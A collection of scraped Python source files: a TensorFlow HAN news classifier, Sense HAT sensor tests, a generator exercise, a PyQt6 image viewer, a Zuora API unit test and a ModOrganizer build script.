PROGRAM","repo_name":"AstroKriel/Geodesics","sub_path":"PlotGyroid.py","file_name":"PlotGyroid.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"31782660621","text":"#!/usr/bin/python\n#coding=utf8\n\n\"\"\"\n# Created : 2018/12/26\n# Version : python2.7\n# Author : yibo.li \n# File : han_model.py\n# Desc : \n\"\"\"\n\nimport os\nfrom datetime import datetime\nimport tensorflow as tf\n\nfrom util.cnews_loader import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n\nclass TextHan(object):\n def __init__(self, seq_length, num_classes, vocab_size):\n self.seq_length = seq_length\n self.num_classes = num_classes\n self.vocab_size = vocab_size\n self.embedding_dim = 128\n self.num_sentences = 10\n self.hidden_dim = 128\n self.context_dim = 256\n self.rnn_type = \"lstm\"\n self.input_x = tf.placeholder(tf.int32, [None, self.seq_length], name='input_x')\n self.input_y = tf.placeholder(tf.float32, [None, self.num_classes], name='input_y')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n self.learning_rate = tf.placeholder(tf.float32, name='learn_rate')\n\n self.inference()\n\n def inference(self):\n\n def _get_cell():\n if self.rnn_type == \"vanilla\":\n return tf.nn.rnn_cell.BasicRNNCell(self.context_dim)\n elif self.rnn_type == \"lstm\":\n return tf.nn.rnn_cell.BasicLSTMCell(self.context_dim)\n else:\n return tf.nn.rnn_cell.GRUCell(self.context_dim)\n\n def _Bidirectional_Encoder(inputs, name):\n with tf.variable_scope(name):\n fw_cell = _get_cell()\n fw_cell = tf.nn.rnn_cell.DropoutWrapper(fw_cell, output_keep_prob=self.keep_prob)\n bw_cell = _get_cell()\n bw_cell = tf.nn.rnn_cell.DropoutWrapper(bw_cell, output_keep_prob=self.keep_prob)\n (output_fw, output_bw), states = tf.nn.bidirectional_dynamic_rnn(cell_fw=fw_cell,\n cell_bw=bw_cell,\n inputs=inputs,\n dtype=tf.float32)\n return output_fw, output_bw\n\n def _attention(inputs, name):\n with tf.variable_scope(name):\n # 使用一个全连接层编码 GRU 的输出,相当于一个隐藏层\n # [batch_size,sentence_length,hidden_size * 2]\n hidden_vec = tf.layers.dense(inputs, self.hidden_dim * 2,\n activation=tf.nn.tanh, name='w_hidden')\n\n # u_context是上下文的重要性向量,用于区分不同单词/句子对于句子/文档的重要程度,\n # [hidden_size * 2]\n u_context = tf.Variable(tf.truncated_normal([self.hidden_dim * 2]), name='u_context')\n # [batch_size,sequence_length]\n alpha = tf.nn.softmax(tf.reduce_sum(tf.multiply(hidden_vec, u_context),\n axis=2, keep_dims=True), dim=1)\n # before reduce_sum [batch_size, sequence_length, hidden_szie*2],\n # after reduce_sum [batch_size, hidden_size*2]\n attention_output = tf.reduce_sum(tf.multiply(inputs, alpha), axis=1)\n\n return attention_output\n\n # 词向量映射\n with tf.name_scope(\"embedding\"):\n input_x = tf.split(self.input_x, self.num_sentences, axis=1)\n # shape:[None,self.num_sentences,self.sequence_length/num_sentences]\n input_x = tf.stack(input_x, axis=1)\n embedding = tf.get_variable(\"embedding\", [self.vocab_size, self.embedding_dim])\n # [None,num_sentences,sentence_length,embed_size]\n embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)\n # [batch_size*num_sentences,sentence_length,embed_size]\n sentence_len = int(self.seq_length / self.num_sentences)\n embedding_inputs_reshaped = tf.reshape(embedding_inputs,\n shape=[-1, sentence_len, self.embedding_dim])\n with tf.name_scope(\"word_vec\"):\n (output_fw, output_bw) = _Bidirectional_Encoder(embedding_inputs_reshaped, \"word_vec\")\n # [batch_size*num_sentences,sentence_length,hidden_size * 2]\n word_hidden_state = tf.concat((output_fw, output_bw), 2)\n\n with tf.name_scope(\"word_attention\"):\n \"\"\"\n attention process:\n 1.get logits for each word in the sentence.\n 2.get possibility distribution for each word in the sentence.\n 3.get weighted sum for the sentence as sentence representation.\n \"\"\"\n # [batch_size*num_sentences, hidden_size * 2]\n sentence_vec = _attention(word_hidden_state, \"word_attention\")\n\n with tf.name_scope(\"sentence_vec\"):\n # [batch_size,num_sentences,hidden_size*2]\n sentence_vec = tf.reshape(sentence_vec, shape=[-1, self.num_sentences,\n self.context_dim * 2])\n output_fw, output_bw = _Bidirectional_Encoder(sentence_vec, \"sentence_vec\")\n # [batch_size*num_sentences,sentence_length,hidden_size * 2]\n sentence_hidden_state = tf.concat((output_fw, output_bw), 2)\n\n with tf.name_scope(\"sentence_attention\"):\n # [batch_size, hidden_size * 2]\n doc_vec = _attention(sentence_hidden_state, \"sentence_attention\")\n\n # Add dropout\n with tf.name_scope(\"dropout\"):\n h_drop = tf.nn.dropout(doc_vec, self.keep_prob)\n\n with tf.name_scope(\"score\"):\n # 分类器\n self.logits = tf.layers.dense(h_drop, self.num_classes, name='fc2')\n self.y_pred_cls = tf.argmax(tf.nn.softmax(self.logits), 1, name=\"pred\") # 预测类别\n\n with tf.name_scope(\"optimize\"):\n # 损失函数,交叉熵\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.input_y)\n self.loss = tf.reduce_mean(cross_entropy, name=\"loss\")\n # 优化器\n self.optim = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n with tf.name_scope(\"accuracy\"):\n # 准确率\n correct_pred = tf.equal(tf.argmax(self.input_y, 1), self.y_pred_cls)\n self.acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name=\"acc\")\n\n\ndef evaluate(sess, model, x_, y_):\n \"\"\"\n 评估 val data 的准确率和损失\n \"\"\"\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, 64)\n total_loss = 0.0\n total_acc = 0.0\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n feed_dict = {model.input_x: x_batch, model.input_y: y_batch,\n model.keep_prob: 1}\n loss, acc = sess.run([model.loss, model.acc], feed_dict=feed_dict)\n total_loss += loss * batch_len\n total_acc += acc * batch_len\n\n return total_loss / data_len, total_acc / data_len\n\n\ndef test_model(sess, graph, x_, y_):\n \"\"\"\n\n :param sess:\n :param graph:\n :param x_:\n :param y_:\n :return:\n \"\"\"\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, 64)\n total_loss = 0.0\n total_acc = 0.0\n\n input_x = graph.get_operation_by_name('input_x').outputs[0]\n input_y = graph.get_operation_by_name('input_y').outputs[0]\n keep_prob = graph.get_operation_by_name('keep_prob').outputs[0]\n loss = graph.get_operation_by_name('optimize/loss').outputs[0]\n acc = graph.get_operation_by_name('accuracy/acc').outputs[0]\n\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n feed_dict = {input_x: x_batch, input_y: y_batch,\n keep_prob: 1}\n test_loss, test_acc = sess.run([loss, acc], feed_dict=feed_dict)\n total_loss += test_loss * batch_len\n total_acc += test_acc * batch_len\n\n return total_loss / data_len, total_acc / data_len\n\n\ndef main():\n word_to_id, id_to_word = word_2_id(vocab_dir)\n cat_to_id, id_to_cat = cat_2_id()\n\n x_train, y_train = process_file(train_dir, word_to_id, cat_to_id, max_length)\n x_val, y_val = process_file(val_dir, word_to_id, cat_to_id, max_length)\n\n epochs = 10\n best_acc_val = 0.0 # 最佳验证集准确率\n train_steps = 0\n val_loss = 0.0\n val_acc = 0.0\n with tf.Graph().as_default():\n seq_length = max_length\n num_classes = 10\n vocab_size = 5000\n model = TextHan(seq_length, num_classes, vocab_size)\n saver = tf.train.Saver()\n sess = tf.Session()\n with sess.as_default():\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n print('Epoch:', epoch + 1)\n batch_train = batch_iter(x_train, y_train, 64)\n for x_batch, y_batch in batch_train:\n train_steps += 1\n learn_rate = 0.001\n # learning rate vary\n feed_dict = {model.input_x: x_batch, model.input_y: y_batch,\n model.keep_prob: 0.5, model.learning_rate: learn_rate}\n\n _, train_loss, train_acc = sess.run([model.optim, model.loss,\n model.acc], feed_dict=feed_dict)\n\n if train_steps % 500 == 0:\n val_loss, val_acc = evaluate(sess, model, x_val, y_val)\n\n if val_acc > best_acc_val:\n # 保存最好结果\n best_acc_val = val_acc\n last_improved = train_steps\n saver.save(sess, \"./model/han/model\", global_step=train_steps)\n # saver.save(sess=session, save_path=save_path)\n improved_str = '*'\n else:\n improved_str = ''\n\n now_time = datetime.now()\n msg = 'Iter: {0:>6}, Train Loss: {1:>6.2}, Train Acc: {2:>7.2%},' \\\n + ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5} {6}'\n print(msg.format(train_steps, train_loss, train_acc, val_loss, val_acc, now_time, improved_str))\n\n\ndef test():\n word_to_id, id_to_word = word_2_id(vocab_dir)\n cat_to_id, id_to_cat = cat_2_id()\n x_test, y_test = process_file(test_dir, word_to_id, cat_to_id, max_length)\n graph_path = \"./model/han/model-7500.meta\"\n model_path = \"./model/han\"\n graph = tf.Graph()\n saver = tf.train.import_meta_graph(graph_path, graph=graph)\n sess = tf.Session(graph=graph)\n saver.restore(sess, tf.train.latest_checkpoint(model_path))\n test_loss, test_acc = test_model(sess, graph, x_test, y_test)\n print(\"Test loss: %f, Test acc: %f\" % (test_loss, test_acc))\n\n\nif __name__ == \"__main__\":\n base_dir = \"./data/cnews\"\n train_dir = os.path.join(base_dir, 'cnews.train.txt')\n test_dir = os.path.join(base_dir, 'cnews.test.txt')\n val_dir = os.path.join(base_dir, 'cnews.val.txt')\n vocab_dir = os.path.join(base_dir, 'cnews.vocab.txt')\n\n vocab_size = 5000\n max_length = 600\n\n if not os.path.exists(vocab_dir):\n build_vocab(train_dir, vocab_dir, vocab_size)\n\n main()\n # test()","repo_name":"liyibo/text-classification-demos","sub_path":"han_model.py","file_name":"han_model.py","file_ext":"py","file_size_in_byte":11326,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"51"} +{"seq_id":"4287447014","text":"from sense_hat import SenseHat\r\nfrom time import sleep\r\n\r\nsense = SenseHat()\r\n# sense.clear()\r\n\r\n#Basic Color Definitions\r\n# blue = (0, 0, 255)\r\n# red = (255, 0, 0)\r\n\r\n#Setting Individual Pixels\r\n#-----------------------------------------------\r\n# sense.set_pixel(0, 2, blue)\r\n# sense.set_pixel(7, 4, red)\r\n\r\n# sense.set_pixel(2, 2, (0, 0, 255))\r\n# sense.set_pixel(4, 2, (0, 0, 255))\r\n# sense.set_pixel(3, 4, (100, 0, 0))\r\n# sense.set_pixel(1, 5, (255, 0, 0))\r\n# sense.set_pixel(2, 6, (255, 0, 0))\r\n# sense.set_pixel(3, 6, (255, 0, 0))\r\n# sense.set_pixel(4, 6, (255, 0, 0))\r\n# sense.set_pixel(5, 5, (255, 0, 0))\r\n#-----------------------------------------------\r\n\r\n#Rotating image\r\n#-----------------------------------------------\r\n# w = (150, 150, 150)\r\n# b = (0, 0, 255)\r\n# e = (0, 0, 0)\r\n#\r\n# image = [\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e,\r\n# w,w,w,e,e,w,w,w,\r\n# w,w,b,e,e,w,w,b,\r\n# w,w,w,e,e,w,w,w,\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e\r\n# ]\r\n#\r\n# sense.set_pixels(image)\r\n#\r\n# while True:\r\n# sleep(1)\r\n# sense.flip_h()\r\n#-----------------------------------------------\r\n\r\n#Smiley Pixels :)\r\n#-----------------------------------------------\r\n# Define some colours\r\ng = (0, 255, 0) # Green\r\nb = (0, 0, 0) # Black\r\nw = (255, 255, 255) #White\r\nu = (0, 0, 255) #Blue\r\n\r\n# Set up where each colour will display\r\nsmile_pixels = [\r\n g, g, g, g, g, g, g, g,\r\n g, g, g, g, g, g, g, g,\r\n g, u, u, g, g, u, u, g,\r\n g, u, u, g, g, u, u, g,\r\n g, g, g, g, g, g, g, g,\r\n g, u, g, g, g, g, u, g,\r\n g, g, u, u, u, u, g, g,\r\n g, g, g, g, g, g, g, g\r\n]\r\n\r\n# Display these colours on the LED matrix\r\nsense.set_pixels(smile_pixels)\r\n#-----------------------------------------------\r\n\r\n#Enviornment sensor readings\r\n#-----------------------------------------------\r\n# pressure = sense.get_pressure()\r\n# temp = sense.get_temperature()\r\n# humid = sense.get_humidity()\r\n#\r\n# print \"\\nPressure: {0:.2f} Millibars\\n\".format(pressure)\r\n# print \"Temperature: {0:.2f} Celsius\\n\".format(temp)\r\n# print \"Humidity: {0:.2f}%\\n\".format(humid)\r\n\r\n#-----------------------------------------------\r\n\r\n#Create Scrolling text display of Enviornmental sensors\r\n#-----------------------------------------------\r\n# while True:\r\n#\r\n# # Take readings from all three sensors\r\n# t = sense.get_temperature()\r\n# p = sense.get_pressure()\r\n# h = sense.get_humidity()\r\n#\r\n# # Round the values to one decimal place\r\n# t = round(t, 1)\r\n# p = round(p, 1)\r\n# h = round(h, 1)\r\n#\r\n# # Create the message\r\n# # str() converts the value to a string so it can be concatenated\r\n# message = \"Temperature: \" + str(t) + \" C... \" + \" Pressure: \" + str(p) + \" mB... \" + \" Humidity: \" + str(h) + \"%\"\r\n#\r\n# # Display the scrolling message\r\n# sense.show_message(message, scroll_speed=0.05)\r\n#-----------------------------------------------\r\n\r\n#Accelerometer data\r\n#-----------------------------------------------\r\nwhile True:\r\n\tacceleration = sense.get_accelerometer_raw()\r\n\tx = acceleration['x']\r\n\ty = acceleration['y']\r\n\tz = acceleration['z']\r\n\r\n\tx=round(x, 0)\r\n\ty=round(y, 0)\r\n\tz=round(z, 0)\r\n\r\n\tprint(\"x={0}, y={1}, z={2}\".format(x, y, z))\r\n#-----------------------------------------------\r\n","repo_name":"arafferty10/piSenseHat","sub_path":"senseHatTest.py","file_name":"senseHatTest.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33887483396","text":"# #Here's an example of a generator function that produces a sequence of numbers\r\n# def my_generator(n):\r\n# value = 0\r\n# while value < n:\r\n# yield value\r\n# value = value+1\r\n \r\n# n=int(input())\r\n# for value in my_generator(n):\r\n# print(value)\r\n\r\n# #Generator Expression Syntax\r\n# # (expression for item in iterable)\r\n\r\n# #Example 2: Python Generator Expression\r\n# square_generator = (i*i for i in range(5))\r\n\r\n# for i in square_generator:\r\n# print(i)\r\n\r\n# #output:-\r\n# # 0\r\n# # 1\r\n# # 4\r\n# # 9\r\n# # # 16\r\n\r\n# # Infinite list of prime numbers using Python generators........\r\n\r\ndef prime_generator():\r\n n=2\r\n while True:\r\n n=n+1\r\n yield n\r\n\r\ngenerator = prime_generator()\r\nfor i in range(10):\r\n print(next(generator))\r\n\r\n","repo_name":"Harsh-Patidar/Python_programming","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19933108443","text":"import sys\r\nimport random\r\nimport pickle\r\nimport requests\r\nfrom PyQt6.QtWidgets import *\r\nfrom PyQt6.QtCore import Qt\r\nfrom PyQt6.QtGui import QImage, QPixmap, QPen,QPainter,QColor\r\n#Code by R-Nithish (R.No 21PD23) PSG College Of Technology, Coimbatore\r\n#\r\n# Class to download given image\r\n#\r\n# Member Functions:\r\n# 1) download()\r\n# This function uses the requests API to download the \r\n# image from the given URL.\r\n#\r\n\r\nclass DownloadableImage:\r\n def __init__(self, url):\r\n self.url = url\r\n\r\n def download(self):\r\n try:\r\n response = requests.get(self.url)\r\n img = QImage()\r\n img.loadFromData(response.content)\r\n return QPixmap.fromImage(img)\r\n except Exception as e:\r\n QMessageBox.critical(None, \"Error downloading image\", \r\n f\"Unable to download an image: {e}\")\r\n return None\r\n\r\n#\r\n# Class to initiate the GUI\r\n#\r\n\r\nclass ImageGraphicsScene(QGraphicsScene):\r\n def __init__(self):\r\n super().__init__()\r\n self.center_line = None\r\n\r\n def clear_center_line(self):\r\n if self.center_line:\r\n self.removeItem(self.center_line)\r\n self.center_line = None\r\n\r\n def draw_center_line(self, start, end):\r\n pen = QPen()\r\n pen.setWidth(2)\r\n pen.setStyle(Qt.PenStyle.DotLine)\r\n\r\n self.center_line = \\\r\n self.addLine(start.x(), start.y(), end.x(), end.y(), pen)\r\n\r\n#\r\n# Class to initiate the main window\r\n#\r\n# Member Functions:\r\n# 1) init_gui()\r\n# Adding buttons and defining layout.\r\n# \r\n# 2) add_image()\r\n# Adding functionality to the add image button.\r\n#\r\n# 3) group_images()\r\n# Adding functionality to group image button.\r\n#\r\n# 4) get_random_image_url()\r\n# Use random function to choose a random URL from \r\n# the given set of image URL.\r\n#\r\n# 5) connnect_central_points()\r\n# Adding functionality to the connect central points \r\n# button.\r\n#\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n\r\n self.init_gui()\r\n\r\n def init_gui(self):\r\n self.scene = ImageGraphicsScene()\r\n self.view = QGraphicsView(self.scene)\r\n\r\n self.button_add = QPushButton(\"Add Image\")\r\n self.button_add.clicked.connect(self.add_image)\r\n\r\n self.button_group = QPushButton(\"Group Images\")\r\n self.button_group.clicked.connect(self.group_images)\r\n\r\n self.button_connect_center = \\\r\n QPushButton(\"Connect Image Centers\")\r\n self.button_connect_center.setCheckable(True)\r\n self.button_connect_center.clicked.connect\\\r\n (self.connect_central_points)\r\n\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.view)\r\n layout.addWidget(self.button_add)\r\n layout.addWidget(self.button_group)\r\n layout.addWidget(self.button_connect_center)\r\n\r\n container = QWidget()\r\n container.setLayout(layout)\r\n self.setCentralWidget(container)\r\n\r\n self.setGeometry(100, 100, 1280, 720)\r\n self.setWindowTitle(\"Image viewer\")\r\n\r\n def add_image(self):\r\n random_image_url = self.get_random_image_url()\r\n downloadable_image = DownloadableImage(random_image_url)\r\n image = downloadable_image.download() \r\n\r\n if image:\r\n x, y = random.randint(0, 600), random.randint(0, 400)\r\n item = self.scene.addPixmap(image)\r\n item.setPos(x, y)\r\n item.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsMovable)\r\n item.setFlag \\\r\n (QGraphicsItem.GraphicsItemFlag.ItemIsSelectable)\r\n\r\n width, height = image.width(), image.height()\r\n image_color = None\r\n for i in range(width):\r\n for j in range(height):\r\n color = image.toImage().pixelColor(i, j)\r\n if color.alpha() > 0:\r\n image_color = color\r\n break\r\n\r\n if image_color:\r\n QMessageBox.information(self, \"Image Information\",\r\n f\"Image size: {width} x {height}\")\r\n\r\n def group_images(self):\r\n group = QGraphicsItemGroup()\r\n for item in self.view.scene().selectedItems():\r\n group.addToGroup(item)\r\n\r\n self.view.scene().addItem(group)\r\n group.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsMovable)\r\n group.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsSelectable)\r\n\r\n def get_random_image_url(self):\r\n with open(\"Images.dat\",'rb') as file :\r\n url = random.choice(pickle.load(file))\r\n return \"https://raw.githubusercontent.com/hfg-gmuend/\"+\\\r\n \"openmoji/44c02495e040c52fbea0bfb1cba89aa24754f9a8/\"+\\\r\n \"src/symbols/geometric/\"+url\r\n\r\n def connect_central_points(self, checked):\r\n if checked:\r\n self.view.setRenderHint(QPainter.RenderHint.Antialiasing)\r\n \r\n self.view.setRenderHint\\\r\n (QPainter.RenderHint.SmoothPixmapTransform)\r\n \r\n selected_items = self.view.scene().selectedItems()\r\n\r\n if len(selected_items) < 2:\r\n QMessageBox.warning\r\n (self, \"Cannot Connect Centers\", \r\n \"Select at least two items to connect centers.\")\r\n \r\n self.button_connect_center.setChecked(False)\r\n else:\r\n self.scene.clear_center_line()\r\n p1 = selected_items[0].sceneBoundingRect().center()\r\n p2 = selected_items[1].sceneBoundingRect().center()\r\n self.scene.draw_center_line(p1, p2)\r\n else:\r\n self.view.setRenderHint \r\n (QPainter.RenderHint.Antialiasing, False)\r\n \r\n self.view.setRenderHint\r\n (QPainter.RenderHint.SmoothPixmapTransform, False)\r\n \r\n self.scene.clear_center_line()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n window.show()\r\n sys.exit(app.exec())","repo_name":"Nitaksh/ImageViewer","sub_path":"Image_Viewer.py","file_name":"Image_Viewer.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19427479902","text":"import unittest\nfrom ..zuora.yaml_credentials import YAMLCredentials\nfrom ..zuora.zapi import ZAPI, ZAPIError\nfrom ..zuora.class_fields import ClassFields\n\n\nclass TestClassFields(unittest.TestCase):\n \n def setUp(self):\n self._session = ZAPI(YAMLCredentials('.creds', 'zuora', 'dev'))\n \n def test_get_fields(self):\n describe = ClassFields(self._session, 'Subscription')\n self.assertNotEqual(len(describe), 0)\n\n def test_get_fields_non_existing_class_raise(self):\n with self.assertRaises(ZAPIError):\n describe = ClassFields(self._session, 'NotAClass')\n\n def test_get_fields_non_existing_class_raise_code(self):\n try:\n describe = ClassFields(self._session, 'NotAClass')\n except ZAPIError as e:\n self.assertEqual(e.code, 500)\n \n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"legibe/mogan","sub_path":"mogan/tests/test_class_fields.py","file_name":"test_class_fields.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26893566835","text":"from unibuild import Project\nfrom unibuild.modules import github, cmake, Patch, git, hg, msbuild, build, dummy\nfrom unibuild.utility import lazy, FormatDict\nfrom config import config\nfrom functools import partial\nfrom string import Formatter\nimport os, sys\n\n\n\"\"\"\nSettings\n\"\"\"\n\nloot_version = \"0.10.3\"\ncommit_id = \"g0fcf788\"\n\n\"\"\"\nProjects\n\"\"\"\n\n\nfrom unibuild.projects import sevenzip, qt5, boost, zlib, python, sip, pyqt5, ncc\nfrom unibuild.projects import asmjit, udis86, googletest, spdlog, fmtlib, lz4, WixToolkit\n\n# TODO modorganizer-lootcli needs an overhaul as the api has changed alot\ndef bitness():\n return \"x64\" if config['architecture'] == \"x86_64\" else \"Win32\"\n\t\nProject(\"LootApi\") \\\n .depend(Patch.Copy(\"loot_api.dll\".format(loot_version, commit_id), os.path.join(config[\"paths\"][\"install\"], \"bin\", \"loot\"))\n .depend(github.Release(\"loot\", \"loot\", loot_version, \"loot-api_{}-0-{}_dev_{}\".format(loot_version, commit_id, bitness()),\"7z\",tree_depth=1)\n .set_destination(\"lootapi\"))\n )\n\n\ntl_repo = git.SuperRepository(\"modorganizer_super\")\n\ndef gen_userfile_content(project):\n with open(\"CMakeLists.txt.user.template\", 'r') as f:\n res = Formatter().vformat(f.read(), [], FormatDict({\n 'build_dir' : project['edit_path'],\n 'environment_id': config['qt_environment_id'],\n 'profile_name' : config['qt_profile_name'],\n 'profile_id' : config['qt_profile_id']\n }))\n return res\n\n\ncmake_parameters = [\n \"-DCMAKE_BUILD_TYPE={}\".format(config[\"build_type\"]),\n \"-DDEPENDENCIES_DIR={}\".format(config[\"paths\"][\"build\"]),\n#\tboost git version \t\"-DBOOST_ROOT={}/build/boostgit\",\n \"-DBOOST_ROOT={}/boost_{}\".format(config[\"paths\"][\"build\"], config[\"boost_version\"].replace(\".\", \"_\")),\n]\n\n\nif config.get('optimize', False):\n cmake_parameters.append(\"-DOPTIMIZE_LINK_FLAGS=\\\"/LTCG /INCREMENTAL:NO /OPT:REF /OPT:ICF\\\"\")\n\n\nusvfs = Project(\"usvfs\")\n\nusvfs.depend(cmake.CMake().arguments(cmake_parameters +\n [\"-DCMAKE_INSTALL_PREFIX:PATH={}\".format(config[\"paths\"][\"install\"])] +\n [\"-DPROJ_ARCH={}\".format(\"x86\" if config['architecture'] == 'x86' else \"x64\")])\n .install()\n # TODO Not sure why this is required, will look into it at a later stage once we get the rest to build\n .depend(github.Source(config['Main_Author'], \"usvfs\", \"master\")\n .set_destination(\"usvfs\"))\n .depend(\"AsmJit\")\n .depend(\"Udis86\")\n .depend(\"GTest\")\n .depend(\"fmtlib\")\n .depend(\"spdlog\")\n .depend(\"boost\")\n )\n\n\nif config['architecture'] == 'x86_64':\n usvfs_32 = Project(\"usvfs_32\")\n usvfs_32.depend(build.Run_With_Output(r'\"{0}\" unimake.py -d \"{1}\" --set architecture=\"x86\" -b \"build_32\" -p \"progress_32\" -i \"install_32\" usvfs'.format(sys.executable,config['__build_base_path']),\n name=\"Building usvfs 32bit Dll\",environment=config['__Default_environment'],working_directory=os.path.join(os.getcwd())))\nelse:\n usvfs_32 = Project(\"usvfs_32\")\n usvfs_32.depend(dummy.Success(\"usvfs_32\"))\n\nfor author, git_path, path, branch, dependencies, Build in [\n (config['Main_Author'], \"modorganizer-game_features\", \"game_features\", \"master\", [],False),\n (config['Main_Author'], \"modorganizer-archive\", \"archive\", \"master\", [\"7zip\", \"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-uibase\", \"uibase\", \"QT5.7\", [\"Qt5\", \"boost\"],True),\n (config['Main_Author'], \"modorganizer-lootcli\", \"lootcli\", \"master\", [\"LootApi\", \"boost\"],True),\n (config['Main_Author'], \"modorganizer-esptk\", \"esptk\", \"master\", [\"boost\"],True),\n (config['Main_Author'], \"modorganizer-bsatk\", \"bsatk\", \"master\", [\"zlib\",\"boost\"],True),\n (config['Main_Author'], \"modorganizer-nxmhandler\", \"nxmhandler\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-helper\", \"helper\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-game_gamebryo\", \"game_gamebryo\", \"new_vfs_library\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_features\", \"lz4\"],True),\n (config['Main_Author'], \"modorganizer-game_oblivion\", \"game_oblivion\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_fallout3\", \"game_fallout3\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_fallout4\", \"game_fallout4\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_falloutnv\", \"game_falloutnv\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_skyrim\", \"game_skyrim\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (\"LePresidente\", \"modorganizer-game_skyrimSE\", \"game_skyrimse\", \"dev\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-tool_inieditor\", \"tool_inieditor\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-tool_inibakery\", \"tool_inibakery\", \"master\", [\"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-tool_configurator\", \"tool_configurator\", \"QT5.7\", [\"PyQt5\"],True),\n (config['Main_Author'], \"modorganizer-preview_base\", \"preview_base\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-diagnose_basic\", \"diagnose_basic\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-check_fnis\", \"check_fnis\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_bain\", \"installer_bain\", \"QT5.7\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_manual\", \"installer_manual\", \"QT5.7\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_bundle\", \"installer_bundle\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_quick\", \"installer_quick\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_fomod\", \"installer_fomod\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_ncc\", \"installer_ncc\", \"master\", [\"Qt5\", \"modorganizer-uibase\", \"NCC\"],True),\n (config['Main_Author'], \"modorganizer-bsa_extractor\", \"bsa_extractor\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-plugin_python\", \"plugin_python\", \"master\", [\"Qt5\", \"boost\", \"Python\", \"modorganizer-uibase\",\n \"sip\"],True),\n (config['Main_Author'], \"githubpp\", \"githubpp\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer\", \"modorganizer\", \"QT5.7\", [\"Qt5\", \"boost\", \"usvfs_32\",\n \"modorganizer-uibase\", \"modorganizer-archive\",\n \"modorganizer-bsatk\", \"modorganizer-esptk\",\n \"modorganizer-game_features\",\n \"usvfs\",\"githubpp\", \"NCC\"], True),\n]:\n build_step = cmake.CMake().arguments(cmake_parameters +\n [\"-DCMAKE_INSTALL_PREFIX:PATH={}\".format(config[\"paths\"][\"install\"])])\\\n .install()\n\n for dep in dependencies:\n build_step.depend(dep)\n\n project = Project(git_path)\n\n if Build:\n project.depend(build_step.depend(github.Source(author, git_path, branch, super_repository=tl_repo)\n 